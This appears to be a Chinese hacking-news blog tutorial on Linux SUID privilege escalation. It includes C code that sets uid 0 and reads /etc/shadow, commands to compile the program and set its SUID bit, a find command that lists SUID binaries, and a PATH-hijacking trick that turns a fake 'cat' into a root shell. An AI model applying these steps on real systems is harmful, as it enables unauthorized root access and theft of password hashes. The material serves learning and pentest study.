LINUX SUID提权

LINUX SUID提权

黑客资讯访客1970-01-01 8:00:003154A+A-

1、简介

SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。

SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现它的默认权限是000,也就是说除了root管理员以外,所有用户都没有查看或编辑

该文件的权限。但是,在使用passwd命令时如果加上SUID特殊权限位,就可让普通用户临时获得程序所有者的身份,把变更的密码信息写入到shadow文件中。这很像我们在古装剧中见到的手持尚方宝剑的钦差大臣,他手持的尚方宝剑代表的是皇上的权威,因此可以惩戒贪官,但这并不意味着他永久成为了皇上。因此这只是一种有条件的、临时的特殊

权限授权方法。

c源代码

#include<stdlib.h>

#include <unistd.h>

int main()

{

setuid(0);//run as root

system("id");

system("cat /etc/shadow");

}


以 root进行编译和权限设置

 

2、编译

 

gcc  suid.c -o suid-exp

 

 

3、设置suid位

 

chmod 4775 suid-exp

1.png

ls 查询文件注意s属性 标识这个程序有suid的属性

或者使用 以下这个命令来查询根本目录下所有带用suid属性的文件

find / -perm -u=s-type f 2>/dev/null

 

2.png

4、切换用户执行

3png.png

5、劫持环境变量提权

4.png

 

因为system函数是继承环境变量 可以通过替换环境变量可以达到执行任意命令。

创建一个文件

echo"/bin/bash">cat && chmod 777 cat

在tmp目录下建立一个文件cat 它会执行一个shell

查看当前环境变量

echo $PATH

把当前tmp目录增加到环境变量

export PATH=.:$PATH  

设置了PATH 执行cat的时候会优先从当前目录下查找程序。所以cat命令会被劫持,

就可以执行任意命令

 

 5.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 俗野冧九2022-06-09 04:04:30
  • =s-type f 2>/dev/null 4、切换用户执行5、劫持环境变量提权 因为system函数是继承环境变量 可以通过替换环境变量可以达到执行任意命令
  • 离鸢叙詓2022-06-09 04:53:27
  • 这个文件就会发现它的默认权限是000,也就是说除了root管理员以外,所有用户都没有查看或编辑该文件的权限。但是,在使用passwd命令时如果加上SUID特殊权限位
  • 语酌柠木2022-06-09 12:54:36
  • 增加到环境变量export PATH=.:$PATH  设置了PATH 执行cat的时候会优先从当前目录下查找程序。所以cat命令会被劫持,就可以执行任意命令  
  • 孤鱼晌融2022-06-09 02:50:22
  •  2、编译 gcc  suid.c -o suid-exp  3、设置suid位 chmod 4775 suid-expls 查询文件注意s属性 标识这个程序有suid的属性

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理